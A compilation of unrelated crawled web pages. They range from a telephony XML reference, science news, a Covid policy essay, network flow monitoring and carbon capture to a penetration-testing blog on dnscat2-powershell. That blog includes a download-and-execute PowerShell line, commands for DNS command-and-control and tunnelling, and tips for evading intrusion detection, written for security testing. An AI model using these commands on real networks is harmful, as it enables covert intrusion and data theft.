|Audiotype||text to speech (tts)||none|
|finishOnKey||0-9 ; * ; #||#|
Here is an example of how <gather> is used within code.
<?xml version="1.0" encoding="UTF-8"?>
<Gather timeout="10" finishOnKey="*" action="handle-key.php">
<Say>Please enter the Extension number you want to dial.</Say>
echo "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n";
echo "<Response><Say>You entered ".$_REQUEST['Digits']. "</Say></Response>"; ?> | <urn:uuid:f16f3f95-a680-4ffe-9bf7-18f99b341c60> | CC-MAIN-2022-40 | https://www.didforsale.com/didml-reference/gather | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00402.warc.gz | en | 0.709259 | 502 | 2.921875 | 3 |
Quantum Vapor Stabilizing Technique Has Implications for Quantum Computing Storage & Sensing
(Phys.org) A technique to stabilize alkali metal vapor density using gold nanoparticles, so electrons can be accessed for applications including quantum computing, atom cooling and precision measurements, has been patented by scientists at the University of Bath.
This has great potential for a range of applications, including logic operations, storage and sensing in quantum computing, as well as in ultra-precise time measurements with atomic clocks, or in medical diagnostics including cardiograms and encephalograms.
Scientists from the University of Bath, working with a colleague at the Bulgarian Academy of Sciences, have devised an ingenious method of controlling the vapor by coating the interior of containers with nanoscopic gold particles 300,000 times smaller than a pinhead.
Professor Ventsislav Valev, from the University of Bath’s Department of Physics led the research. He said: “We are very excited by this discovery because it has so many applications in current and future technologies! It would be useful in atomic cooling, in atomic clocks, in magnetometry and in ultra-high-resolution spectroscopy.” | <urn:uuid:553620a1-ef57-49b8-9b00-94069b285fd4> | CC-MAIN-2022-40 | https://www.insidequantumtechnology.com/news-archive/quantum-vapor-stabilizing-technique-implications-quantum-computing-storage-sensing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00402.warc.gz | en | 0.920549 | 242 | 2.875 | 3 |
Do you use the internet? Guess is you do. Then you must have come across news such as hackers stealing data and bringing down services & websites. Here are some website hacking techniques hackers generally use.
In fact, according to hacking stats:
- 64% of companies admit to facing web attacks
- 1/131 emails contain malware in them
- Every day there are 4000+ ransomware attacks taking place
- 95% breaches happen due to human errors
These stats are startling, to say the least.
This does not mean website owners are reckless. No, they do take precautions. It’s only that – this is not enough! All websites and internet services have minute vulnerabilities that could be abused by this or that website hacking technique. Unless you identify and patch these vulnerabilities on time, you remain unsecured.
After every hack, I’ve seen many wonder – “If only I knew better of these hackers and the website hacking techniques, I might have successfully dodged it.“
While this has some truth to it, it isn’t entirely true.
That being said, of course, peeking into the minds of hackers helps. But without proper security equipment, you are only as good as a weaponless soldier.
So, with this blog post, we have created a window for you to look into the operations of a hacker and understand common web threats and the hacking techniques behind them.
Below are the nine most common website hacking techniques used by attackers.
Top Website Hacking Techniques
1. Social engineering (Phishing, Baiting)
Phishing is a method where the attacker replicates the original website and then leads a victim to use this fake website rather than the original one. Once the victim enters their credentials into this website, all details are sent to the attacker. This method can be used to obtain payment information such as credit card data or personal information such as login credentials to important accounts and websites.
Another type of social engineering is the ‘bait and switch’ attack. In this hacking technique, attackers buy advertising spots on trustworthy and popular websites and put up seemingly legit ads. Once the ads are launched, users click on it only to find themselves inside a website that is filled with malware. These malware gets installed on the victim’s system and then the attacker has a free run within their system
2. DDoS attacks
Distributed Denial of Service (DDoS) is mainly used to bring down websites by crashing their servers. Attackers flood the servers of the targeted website with the help of zombie computers or botnets. This overwhelms the resources of the servers and it crashes. In several cases, this attack was also used to steal user information by freezing the user forms. The recent DDoS attack on GitHub is an excellent example of how severe these attacks can be.
3. Code injection attacks
Code injection is the general term used for attacks that include injecting malicious codes into systems. Whenever there is improper handling of input data, it becomes vulnerable to code injection attacks.
These attacks are possible when input or output data is not properly validated. Once an attacker is able to inject their code into the system, they can compromise the integrity and security of the system. These attacks can also be used as a way to launch further attacks since the system is already infected and thus vulnerable.
4. SQL Injection
This attack majorly exploits vulnerabilities in a website’s SQL libraries or databases. In case a website has any such vulnerability, hackers can use simple SQL codes to obtain information and data from the databases. These simple codes trick the system into considering them as legit queries and then give access to its database.
5. XSS attacks
Also known as Cross-Site Scripting attacks, in this type of attack, hackers inject malicious code into a legit website. When a visitor enters the website and uses their credentials, all data is stored within the website, which the attacker can access anytime. These attacks can be effectively used to steal user data and private information.
There are two types of XSS attacks, stored XSS attacks and reflected XSS attacks. In stored attacks, the infected script is permanently kept in the server. And the attacker can retrieve it anytime. In reflected attacks, the scripts are bounced off web servers in the form of warnings or search results. Since this makes the request look authentic the website processes them and gets infected
6. Exploiting plugin vulnerabilities
If you use WordPress then you must be familiar with plugins (extensions & modules in case of Magento & Drupal respectively). Plugins are considered as the most vulnerable parts of a website. Any outdated or unsecured third-party plugins can be exploited by attackers to take control of your website or bring it down altogether. The best way to stay safe is to always use plugins from trusted sources and always keep your plugins updated
7. Brute force
In this hacking technique, the attackers try multiple combinations of the password until one of the combination matches. This method is simple to execute but requires huge computing power to implement. Longer the password, tougher it is to guess using brute force. Sometimes, attackers also use dictionaries to speed up the process
8. DNS Spoofing
By using DNS spoofing attacks, attackers can force victims to land on a fake website. This is done by changing the IP addresses stored in the DNS server to an address that leads to the attacker’s website. DNS cache poisoning is the process by which the local DNS server, with the infected server. Once the victim lands on the fake website, the attacker can infect the victim’s system with malware and use other website hacking techniques to cause further damage.
9. Cookie theft
As harmless as it sounds, this attack can effectively steal all your important data. During browsing sessions, websites stores tons of cookies on your computer. These cookies contain a lot of sensitive information, including your login credentials such as your passwords or even your payment data. If the attackers get their hands on these cookies, they can either steal all this information or use it to impersonate you online.
The above attacks are generally used against some vulnerability which the attackers exploit. That is why it is crucial to keep updating your software & other systems.
Once a vulnerability is discovered it is necessary to patch it up before an attacker exploits it to cause harm. Ethical hackers and security researchers around the globe try to discover such security gaps to ensure they are fixed. Astra’s VAPT (Vulnerability Assessment & Penetration Testing) does exactly that.
Moreover, you can look up known vulnerabilities in the system/software you are using by following this website: cve.mitre.org
Steps to protect yourself from getting hacked
Now we know the various ways attackers can harm you or your website. This will help us in understanding how attackers work and thus enable us to take more effective steps to protect ourselves from such attackers. Below are some basic steps to protect your data from some common website hacking techniques:
- Use strong passwords and 2-factor authentications wherever possible
- Keep your plugins and software updated with the latest security patches
- Use strong firewalls to prevent DDoS attacks and block unwanted IP addresses
- Maintaining proper code sanitization can help stop SQL injection attacks
- Avoid clicking on any unknown links or opening attachments in email from unknown sources
- Regular security audits to keep track of your website’s security
Websites are always vulnerable to such attacks and one needs to be vigilant round the clock. To monitor your website’s security, Astra’s security firewall is the best option for you.
With their constant monitoring of your website and an intuitive dashboard, you will always be aware of any attempts to sabotage your website.
If you liked this post, go ahead and share this with your friends 🙂 | <urn:uuid:f7916c3d-c5ed-4def-8302-b20625f14d7c> | CC-MAIN-2022-40 | https://www.getastra.com/blog/knowledge-base/website-hacking-techniques/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337516.13/warc/CC-MAIN-20221004152839-20221004182839-00402.warc.gz | en | 0.932056 | 1,610 | 2.515625 | 3 |
Use our Voice API to create a unique phone system. You can now dynamically control, make, receive, or conference from your webserver.Quickstart
A simple mechanism to send alerts, notifications, reminders, updates and more through text messages on your office phones.Learn More
What is an API?
An API stands for Application Programming Interface. An API is a set of programming instructions and standards for accessing web based software. In other words this is how web based applications talk to one another. An API is also referenced to as a “middleware”, with the use of APIs it is possible to develop applications and services independently of the underlying device it will run on.
API’s for business Telecommunications
Since API is an interface that facilitates the communication between two applications, in VoIP telecommunication world this communication happens by sending the calls over internet. These calls are managed through web services. Web services is a standardized way of integrating web applications using XML. | <urn:uuid:15af3a54-46b0-407f-a468-f7bc1ade85df> | CC-MAIN-2022-40 | https://www.didforsale.com/api-docs | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337680.35/warc/CC-MAIN-20221005234659-20221006024659-00402.warc.gz | en | 0.906543 | 204 | 3.125 | 3 |
Schools and bandwidth… Where does your school rank?
Where does your school rank among your neighbors in Internet bandwidth? A new website offers a way to compare yourself with the district leaders, and see how much they are spending on their bandwidth.
Education Super Highway is a nonprofit organization helping public schools receive access to better Internet. They recently launched a website that shows the Internet price of the more than 13,500 U.S. school districts.
The Federal Communications Committee (FCC) has made declarations stating that school districts must provide a certain amount of Kbps (kilobits per second) per student. That amount is currently 100 Kbps per student.
Using this website, school districts will be able to measure how much data each student receives, and how they are comparing to other school districts. This will serve as an incentive and leverage point for school to receive more bandwidth for that they’re paying.
Currently, 23 percent of all public school districts in the U.S. do not meet the FCC’s minimum for bandwidth per student. The report shows how states nationwide are fairing in this race to meet the FCC’s minimum while at the same time demonstrate that they put their students.
In New York the nation’s largest public school district, New York Public Schools, was compared with surrounding districts in the urban setting, like Elmira City School District. The study found that New York Public School were 78 Kbps short of the 100 Kbps, coming to 22 Kbps per student, while Elmira City School District is providing 666 Kbps per student.
Need to roll out mobile devices on campus? D&D can help – Contact us at 800-453-4195, or by clicking here. | <urn:uuid:21476d52-45a2-4dd3-b084-8c6db1f4b40e> | CC-MAIN-2022-40 | https://ddsecurity.com/2016/03/31/school-districts-public-internet-access-students/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00402.warc.gz | en | 0.959133 | 356 | 2.578125 | 3 |
Will the cure be worse than the disease? No-one knows
It will be months, if not years, before we can assess whether the lockdown in response to Covid-19 will have caused more suffering and death than direct infection. Analyses of available data have led to an estimate that it doubles the risk of death within a year for all age groups, adjusted by co-morbidity etc. That implies a death rate in London, for example, of about double that now estimated for the Great Smog of 1952.
What we do “know” for certain is that almost nothing we have been told or might predict is based on robust evidence. The two opening paragraphs of the Chatham House guide to responses around the world indicate succinctly how and why this is so: “confusion, chaos and denial … [while] the window of opportunity to respond closes rapidly … political manoeuvring … lack of co-ordination, ambivalence towards response structures and tensions in key relationships …” We have seen them all. They are compounded by the pressure on journalists to keep ahead of social media in covering the latest “news”, real or rumour. Meanwhile politicians and governments have to be seen to be “in charge” and “ahead of the game”, whether or not they believe the advice they are being given.
Decisions that would normally take months or years have to made within days on the balance of guesstimated probabilities masquerading as “science”. These have ranged from dramatic lock downs and emergency powers based on extrapolating the Wuhan model to the decision by the US Food and Drug Administration to agree the use of obsolete and now rarely used (because of known side effects) anti-malarial drugs in “a wide scale human experiment”, in New York City. According to the Washington Post Political Newsletter a decision which would normally have taken at least nine months of studies and testing was agreed inside three days.
Public and political will are likely to change before we have “reliable” data
The success of the lockdown and the speed with which 750,000 have volunteered to help the NHS response indicate that current UK policy really does have the broad public support indicated by opinion polls, but how long will that last?
The latest YouGov data indicates that support is shallow (“fairly” rather than “very”), particularly among the young. While 68% of the over 65s are very or fairly scared of contracted Covid-19 the same is true of only 43% of those aged 18 – 24. This lack of fear is reflected in their contrasting views of how well the Government has handled the crisis. 32% of the over 65s think the Government has handled the crisis very well compared to only 10% of 18 – 24 year olds.
If the Prime Minister and Health Secretary work through a mild infection we can expect a reaction against the “scientific” advice which has caused the UK to follow most of the world into almost total lockdown while Singapore and Sweden have resisted the pressures to do so. This will almost certainly lead to the lockdown being relaxed before it collapses. Those of my generation (where a doubling of the risk of dying within the year makes a significant difference) may hope that such a relaxation will be selective, as in Wuhan, and tied to the gathering pace of testing. Those aged under 24 might, however, force the pace, while leaving us “kettled” for much longer.
If the Prime Minister and the Health Service team are seriously incapacitated, the experts will be able to say “we told you so” and support for the current scale of lockdown will last longer. leading to an even more painful recovery.
What is the likely end game?
In among the many articles , websites and social media groups covering national and local guidance and volunteering initiatives we are beginning to see some speculating about the nature of the end game in both the US and the UK. The comments in response to such articles indicate thecurrent consensus in support of lockdown, denial of civil liberties and enforced totalitarian collectivism is temporary and fragile.
Some respondents appear to expect recovery policies akin to those after the total mobilisation of World War 2 (including state planning and rationing).
Others, seeing the cleaner city air resulting from falls in traffic, look forward to expediting Green agendas.
Those who have lost jobs, savings and businesses appear split between those who expect Government to help them and tell them what to do and those who have lost faith in Government and want to be free to help themselves and their families to recover.
We can also see concerns that the closure of schools and youth and sports clubs will lead to lead a dangerous period in our inner cities as bored teenagers face a long hot summer with little to do.
Business in lockdown need to not only survive but plan for recovery.
The McKinsey paper “A blueprint for remote working: lessons from China” provides succinct board level guidance (and many links) for those whose organisations may have to survive weeks or months of partial or total lock down and then compete with those who have emerged before them.
- It is difficult to work from home while the children are also learning from home.
- Productivity tails off unless the organisation has plans and strategies for maintaining it.
Five of the eight “lessons from China” echo messages in the quality policy, project management, estimating, documentation, testing and other manuals that underpinned F I’s reputation for better meeting clients’ needs for delivering robust software to time and budget than most of its conventional competitors. The new “lessons” are to do with harnessing and securing the networking technologies we have today to support home-based workers. In short, organisations need to organise and support remote workers properly and also use the opportunity to provide them with the structures and skills the organisation will need for the recovery.
The process of adapting to survive has begun
Yesterday I updated my blog on the guidance and content available for those switching from classroom to home learning as schools, colleges and classroom/residential training centres are closed. It now includes links covering guidance regarding on-line support for apprenticeships and examples (Blue Screen IT and Digital Skills UK ) of how those providing industry recognised courses and qualification are responding.
I have also begun receiving e-mails from Pubs, Restaurants and their suppliers who are now doing home deliveries to their customers and offering to help organise on-line social activities for the organisations whose events they used host.
Parliament has, reluctantly, gone on-line
One of the final actions by Parliament before it went into lockdown was to agree the use of remote conferencing for its Select Committees, discounting the advice of those who, like MOD regarded applications like Zoom as insecure, despite their use by the Prime Minister to host Cabinet meetings. Presumably the Ministers involved did not use Macs, the source of the security flaw publicised by Zoom’s competitors . Many, perhaps most, MPs are now running virtual offices from their homes, linking their constituency and parliamentary staff, also working from home, more closely than before.
So too have the political parties
The Conservative Policy Forum, relaunched last year as the main in-house policy formation arm of the Conservative Party, responded to the canclelation of the Conservative Spring Forum by moving competition for policy ideas on-line. It has also gone on-line for its policy discussion, on responses to the Covid Emergency. The briefing for this includes a clear and succinct summary of what Government has done before asking what more is needed. The questions range from asking for suggestions of local responses that could/should be copied elsewhere, through gaps in provision that need to be addressed, to how we bring lockdown to a successful conclusion and recover afterwards. There is also the question of hope we hope society will change as a result.
Nothing will be the same again.
We will need new thinking, as opposing to the re-shoeing of old hobbyhorses.
As yet the pundits are merely updating their past nostrums. I am no better. I am due to present one of the motions for the CPF policy competition. It is an extension to the off-line world of the case for partnership policing of the on-line world on which I blogged just before Christmas . Handling the recovery from Covid-19 into a changed new world will make such action, including the on-line training of volunteers, even more urgent but we also need to take a good look at the governance structures – local as well as national and international.
One of the other entries in the CPF policy competition is to merge Income Tax and National Insurance. This has been overdue since the link between contributions and benefits atrophied and died. The problems with organising benefits for the surge in unemployment, including among those previously self employed, makes it timely to also use HMRC identities, as well as records, to handle Universal Credit.
That raises the need, as I raised in my most recent blog, to take a new look at data sharing across the public sector, not just to allow mobile phone apps to be used to help enable those who are not infectious to be released from lock down to help the recovery. But that is not the only area where a bonfire of regulation may be needed to help the recovery.
The small print of the response of BEREC (the college of Europe Communications Regulators) contains a call to preserve “Net Neutrality” in the face of pressures to prioritise emergency traffic not that the Internet is the critical infrastructure, alongside power, that is keeping society going. As yet the Internet has coped remarkably well, in part because players like Netflix have voluntarily tuned down resolution, but is “neutrality” between content and types of traffic really appropriate for a core part of the global, not just national, critical infrastructure.
There is much to think about while we are in lockdown if we want to live in a relatively free, safe and democratically accountable society afterwards, for however long it takes us to rebuild prosperity. | <urn:uuid:122e89b5-98c6-4571-ac1f-033da8083be7> | CC-MAIN-2022-40 | https://www.computerweekly.com/blog/When-IT-Meets-Politics/Tomorrow-began-last-week-Preparing-for-a-Post-Covid-Lockdown-World | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00402.warc.gz | en | 0.960819 | 2,079 | 2.578125 | 3 |
What is Flow Monitoring?
Networking monitoring is key to optimizing network and application performance. Part of this strategy involves keeping track of what is going on in your network, which requires a detailed understanding of various data about network traffic. Flow monitoring helps your team accomplish this task and capture all communication going to and from a network device. To understand the importance of flow monitoring, it may be useful to know what a flow is in IT terms.
What is Network Flow?
When devices on a network need to communicate, they establish communication channels. The flow can be thought of as the communication between these two endpoints on the network. A network flow contains information about the series of communications between the endpoints while communication occurs. Some of the data in a flow includes IP protocol, types of service entries, and IP address information.
Monitoring this current of information enables IT teams to gather greater insights on their network.
What is Flow Monitoring?
The first network flow technology was developed by Cisco back in 1996 by Cisco. Flow monitoring is a method that measures the movement of data between two devices or applications on a network. This method aims to give IT teams information about the traffic that crosses through their network as well as how their network is performing on a daily basis.
Network flow shows who is sending data, how they are sending data, and when they are sending data. More recently developed network flow technologies also have expanded capabilities, such as full packet capture and deep packet inspection, both of which give additional insight into network and application performance. IT teams are able to access flow data from a variety of sources, including routers, firewalls, and switches. This information is powerful for network optimization and troubleshooting.
How Does Flow Monitoring Work?
Network information is first collected by a flow exporter as it enters or exits a network interface. The information is then sent to a collector, which processes and stores the data. The collector can be either a piece of hardware or a piece of software. Most commonly, the collector is a piece of software. Finally, an analysis is performed to create visuals and helpful statistics. IT teams then have access to actionable insights around network performance.
Why Do I Need Flow Monitoring?
If your network experiences high volume, older network monitoring techniques usually do not cut it. Your team needs access to the right data at the right time. Flow data provides more information as compared to other network monitoring techniques, such as SNMP-based polling. Flow monitoring is an effective way for IT teams to troubleshoot network issues and keep networks up and running. IT teams recognize network flow analysis as the standard for flow-based network traffic analysis.
Flow Monitoring Benefits
Organizations enjoy a number of advantages when implementing flow monitoring technology. Here are just a few benefits you will enjoy:
Optimize Your Network Bandwidth Usage
Organizations often make incorrect assumptions around their bandwidth usage. Luckily, flow monitoring allows you to monitor bandwidth usage in real-time in order to identify users and devices who are consuming bandwidth. Other monitoring techniques are known to provide incorrect readings that falsely indicate that you need more bandwidth—when in reality only a few users are responsible for most of the bandwidth usage. Flow monitoring ensures that you fully understand how your bandwidth is being used. IT teams can identify users who are consuming more bandwidth than average and take action to correct those issues.
Another bandwidth issue to consider is that you also need to be sure that your network will be able to handle future traffic volumes. IT teams can use historical network flow data to plan for future bandwidth upgrades.
Flow monitoring is a powerful tool when verifying or troubleshooting the performance of certain applications or parts of the IT infrastructure. IT teams use network flow information to take any necessary corrective action. Additionally, flow monitoring technology easily integrates with other network monitoring solutions to get an overview of troubleshooting alerts. IT teams receive alerts when issues arise—such DNS misuse or problems with TLS—all in one place.
Monitoring traffic for hackers and malicious devices is a routine part of a network administrator’s day. Flow monitoring detects traffic that is already inside of the network, as opposed to detecting traffic at the boundary of the network. This enables your team to identify potential threats that other cyber defenses have missed.
Flow monitoring identifies traffic that deviates from normal traffic behavior. Although this network monitoring technique does not give all the detailed data for cybersecurity, it gives your team a starting point for deeper analysis. Your team will be able to proactively identify DDoS attacks, anomalous network activity, and more.
Data that is collected from flow monitoring provides a grander view of what is going on in your network, and flow monitoring allows your team to see the route that data packets take through your network. Your team will be able to understand the potential effects of a new application, network topology, or an increase in traffic.
LiveAction provides clients with LiveWire, which converts packet data into rich flow for the LiveNX flow solution. Clients can easily (and quickly) isolate problem areas and rapidly respond to high-severity incidents without the need for deep forensic analysis. If you’re interested in learning more about LiveAction flow monitoring solutions, reach out to our team to schedule a demo today! | <urn:uuid:f2e58d6d-11e7-4691-83b1-754570e6d21e> | CC-MAIN-2022-40 | https://www.liveaction.com/resources/blog/what-is-flow-monitoring/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00402.warc.gz | en | 0.936314 | 1,079 | 2.96875 | 3 |
Luke Baggett //
Imagine a scenario where a Penetration Tester is trying to set up command and control on an internal network blocking all outbound traffic, except traffic towards a few specific servers the tester has no access to. In this situation, there is still a last-ditch option the tester can use, that being DNS command and control.
If you’re unfamiliar with DNS command and control, the basic idea involves a C2 client sending data inside DNS queries. These DNS queries are forwarded across the internet’s DNS hierarchy to an authoritative DNS server, where the C2 server is located. The C2 server then returns data inside the DNS response, which is forwarded back to the C2 client. DNS must be implemented to allow an internal network to communicate with the Internet in any meaningful way, therefore C2 over DNS is highly effective.
Dnscat2 by Ron Bowes is one of the best DNS tunnel tools around for infosec-related applications. DNScat2 supports encryption, authentication via pre-shared secrets, multiple simultaneous sessions, tunnels similar to those in ssh, command shells, and the most popular DNS query types (TXT, MX, CNAME, A, AAAA). The client is written in C, and the server is written in ruby.
I recently finished implementing all the features of the dnscat2 C client in a PowerShell client available here, and included a few extra PowerShell specific features. PowerShell is quite common among real-world attackers and penetration testers alike due to its numerous features, versatility, and the fact it is built in to most Windows systems. In this blog post, we’ll look at how the dnscat2-powershell script can be used.
Although dnscat2 is designed to travel over DNS servers on the Internet, it can also send DNS requests directly to a dnscat2 server, which is useful for testing. This blog post will only show examples using local connections, but you can read about how to set up an authoritative server here.
Ron Bowes gives a great tutorial on how to install the server in his README for dnscat2. Once the server is ready, you can start it like this:
sudo ruby dnscat2.rb --dns “domain=test,host=192.168.56.1” --no-cache
Using the “—no-cache” option is required for the PowerShell client to work correctly due to the fact that the nslookup command uses sequential DNS transaction ID values that are not initially randomized.
A Windows machine with PowerShell version 2.0 or later installed is required to use dnscat2-Powershell. The dnscat2 functions can be loaded by downloading the script and running the following command:
Alternatively you can paste the following command into PowerShell to enable the dnscat2-powershell functionality:
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/ lukebaggett/dnscat2-powershell/master/dnscat2.ps1')
Once the functions are loaded, run the following command to start the dnscat2-powershell server:
Start-Dnscat2 -Domain test -DNSServer 192.168.56.1
Start-Dnscat2 is the name of the main function used in dnscat2-powershell that allows clients to establish a command session with the server. From the server, you can now direct the client to perform different actions. Here’s a video that shows what this looks like:
If you don’t want to use a command session, you can use the -Exec, -ExecPS, or -Console parameters for Start-Dnscat2.
Extra PowerShell-related features have been added to dnscat2-powershell command session. For example, you can simulate an interactive PowerShell session by typing the following command:
You may also pass the -ExecPS switch to Start-Dnscat2 to enable this feature. The client will take input from the server, pass it to Invoke-Expression, and return the output. Variables are preserved throughout the client’s lifespan. This allows the usage of awesome PowerShell tools such as PowerSploit.
Scripts can be loaded into memory on the client over DNS by typing the following command:
upload /tmp/script.ps1 hex:$var
The hex representation of the file will be placed into the $var variable. From there, the hex can be converted to a string and loaded as a PowerShell function. Similarly, typing the following command:
upload bytes:$var /tmp/var
will download a byte array stored in $var, and write it to /tmp/var. At the moment, these two features are new and buggy, and are more reliable with smaller scripts.
By default, all traffic is encrypted. This can be turned off by passing -NoEncryption to Start-Dnscat2, and starting the server with following command option:
Without encryption, all dnscat2 packets are simply hex encoded, making it fairly simple for people who know the dnscat2 protocol to reassemble the data.
Authentication with a pre-shared secret can be used to prevent man in the middle by passing a password to -PreSharedSecret on the client, and the –c option on the server.
Dnscat2 supports tunnels similar to SSH Local Port forwarding. The dnscat2 server listens on a local port and any connection to that port are forwarded through the DNS tunnel, and the dnscat2 client forwards the connection to a port on another host.
One scenario where this comes in handy is when the dnscat2 client is on an internal network with an SSH server. By setting up a tunnel from a port on the server to the SSH server on the internal network, you can achieve an interactive SSH session over DNS. The below video shows how this is done:
Avoiding Detection by generic signatures
There are many ways to detect DNS tunnels. Checking the query length of outbound DNS queries, monitoring the frequency of DNS queries from specific hosts, and checking for specific uncommon query types are a few examples.
A static or random delay can be added between each request the client sends by using -Delay and -MaxRandomDelay with Start-Dnscat2. The delay can be changed from a command session by typing the following command:
This can help avoid detection by systems using frequency based analysis. It’s useful for a DNS tunnel to use the maximum length of a DNS query to transfer data faster. Yet, how often is a legitimate user going to be sending maximum length DNS queries? A signature could be written based on queries using the precise maximum length of a query. If you want to be slightly more stealthy, you can shorten your maximum request size with the -MaxPacketSize parameter.
Many DNS tunnels will use TXT, CNAME, or MX queries due to the simplicity of processing their responses, and their long response length. These aren’t the most common query types, so an IDS may alert on the high frequency of these queries. A and AAAA queries are much more expected, so using them may help you slip past IDS detection. The -LookupTypes parameter for Start-Dnscat2 can be used to pass a list of valid query types to the client. The client will randomly select a query type from this list for each DNS query it sends.
Using all three of these options makes writing a good signature for dnscat2 slightly more complicated. A video below shows all of these options combined, and how modifying the options noticeably impacts data transfer speed.
Tunneling your communications through DNS has some real practical advantages. Primarily, providing a shell in environments with even the most extreme outbound traffic filtering. The major downside is the slow speeds involved with forwarding all your traffic through the internet’s DNS servers. Now with a PowerShell version of the dnscat2 client, penetration testers can easily use DNS-based C2 alongside familiar PowerShell tools.
Join the BHIS Blog Mailing List – get notified when we post new blogs, webcasts, and podcasts. | <urn:uuid:4f7adb79-f4c5-4036-b804-d799206019be> | CC-MAIN-2022-40 | https://www.blackhillsinfosec.com/powershell-dns-command-control-with-dnscat2-powershell/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00602.warc.gz | en | 0.884972 | 1,798 | 2.546875 | 3 |
Computers have a lot of moving parts to them. A network system can be very complicated, and unless you have the time to spend learning about everything (which most business owners do not), you really just need a system that works. However, if you do familiarize yourself with some basic functions, you can end up making smarter, more efficient decisions regarding the IT for your company.
That’s why we wanted to explain one of the most basic differences when it comes to the amount of space you have available on your system- RAM and Hard Drive.
What Do They Do?
Both of these pieces perform the same basic function- they store information and make it available to you. The difference is in the roles they play in how they store that information. To better understand the differences, it helps to explain their relationship.
The easiest way to understand the relationship between RAM and hard drive space, is to think in terms of the human brain. The hard drive is the long-term memory, and the RAM is the short-term memory. They work together to help store information as needed, and make sure it is available when you need it- whether that is ten minutes from now, or ten years.
Basically, when you want to retrieve something from your hard drive (opening a program, pulling up an old document), the RAM acts as the middle man. It will communicate with your hard drive, and pull up the information from the hard drive for you. So, whenever you open up a file of pictures or reports, you are actually looking at it off of the RAM, not the hard drive itself.
That is why, when your computer starts slowing down, one of the things an engineer will check is how much RAM you have on your computer. By getting more RAM, or replacing old RAM with newer versions, you can increase the speed of your computer.
What About CPU?
It is important to note here though, that sometimes just increasing or replacing the amount of RAM is not enough to fix your computer. In some cases, you need to look at the CPU (Central Processing Unit) to determine if the problem goes deeper, to the brains of the computer. To learn more about CPU, read this blog post 9 Phrases of IT Lingo You Should Know.
The best way to think about the relationship between CPU and RAM is like an assembly line in a factory. The RAM is the assembly line workers, the real people, and the CPU is the machinery. If production in the factory is too slow, you can add more workers on to the assembly line, and usually that will fix the problem. However, if the problem is with the machinery itself, if it is not making the product fast enough, it won’t matter how many assembly line workers you have, your productivity will never progress past a certain level.
So, if it turns out the problem is with your CPU speed, adding and/or replacing RAM is not going to help speed up the machine.
RAM is a really important part of your system. It may seem small and insignificant, but if your RAM is not working properly you will quickly feel the impact.
Now that you understand a little more about what RAM is and what role it plays on your computer, you will be able to make more informed decisions about what you need in order to keep your system, and therefore your organization, running as efficiently as possible. | <urn:uuid:48c10233-4ca3-4522-8280-9ad58f9d4e24> | CC-MAIN-2022-40 | https://www.networkdepot.com/ram-and-hard-drive-space/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00602.warc.gz | en | 0.954737 | 695 | 3.703125 | 4 |
Carbon management technologies have a huge potential to remove CO2 from the atmosphere, but policymakers must act quickly and give these technologies the visibility they need to deploy and help halt global warming, ministers and experts speaking at a forum on the topic said.
Ministers and experts spoke at the first High-Level Roundtable on Carbon Management Technologies on hosted by the International Energy Forum (IEF) in collaboration with the King Abdullah Petroleum Studies and Research Centre (KAPSARC) and the Clean Energy Ministerial Secretariat (CEM).
The roundtable examined how best to accelerate the deployment of technologies such as Carbon Capture, Utilisation and Storage (CCUS) and other circular carbon models in industry practice, and energy and climate policy in the Gulf region and across Europe, North America, and Asia-Oceania. CCUS involves a series of technologies to capture CO2 from energy flows, waste gases, or the atmosphere and inject it into geological structures for permanent storage or convert it into products such as plastics or concrete, in addition to nature-based solutions.
“CCUS is, of course, one of the solutions we in the oil industry have to combat the effects of climate change,” H.E. Shaikh Mohammed bin Khalifa Al Khalifa, Minister of Oil, Bahrain, said.
As part of its nationwide climate strategy, the United Arab Emirates has a target of five million tons of captured CO2 to be injected by 2030, equivalent to the capture capacity of five million acres of forest, said Suhail Mohamed Al Mazrouei, Minister of Energy, and Infrastructure.
CCUS projects benefit from government support to offset a variety of risk factors, such as high-upfront costs, poorly developed markets and ill-defined policy or regulatory frameworks — all of which have slowed uptake, experts said.
G20 Energy Ministers endorsed the Circular Carbon Economy Platform in September 2020. The G20 Climate and Energy Ministers Meeting in July 2021 explicitly recognised the need for investment and financing for advanced clean technologies including CCUS and carbon recycling.
“Definitely, the world is getting together on one fact,” UAE minister Al Mazrouei, said. “We need to do things faster, and we need to do more on this important subject.”
An international CCUS mechanism to broaden the scope of CCUS policies, possibly under the aegis of the IEF, would help catalyse investment and advance development, said Joseph McMonigle, Secretary General of the IEF. “The quest to achieve climate neutrality, for instance by building a vibrant hydrogen economy by 2050, depends on economy-wide uptake of CCUS and international collaboration to focus on high-impact areas,” he added. “In short, it’s time to green light CCUS.”
Adam Sieminski, senior advisor to the King Abdullah Petroleum Studies and Research Centre (KAPSARC) Board of Trustees said: “The circular carbon economy and the CCUS framework represents an integrated and holistic approach toward realizing carbon dioxide and other greenhouse gas emissions targets. Governments can and must play an important role to achieve CCUS deployment.”
That has been the strategy in Norway, said Lars Andreas Lunde, Deputy Minister for Norway’s Ministry of Petroleum and Energy. Norway has invested heavily in CCUS technology in its early phases, with two-thirds of financing and risk taken on by the government, with the full knowledge that these early stages are not profitable.
“These are complexity and expense issues,” said Mr Lunde. “In an early phase, we needed state support. Carbon capture and storage especially CCUS should be profitable on the longer end.”
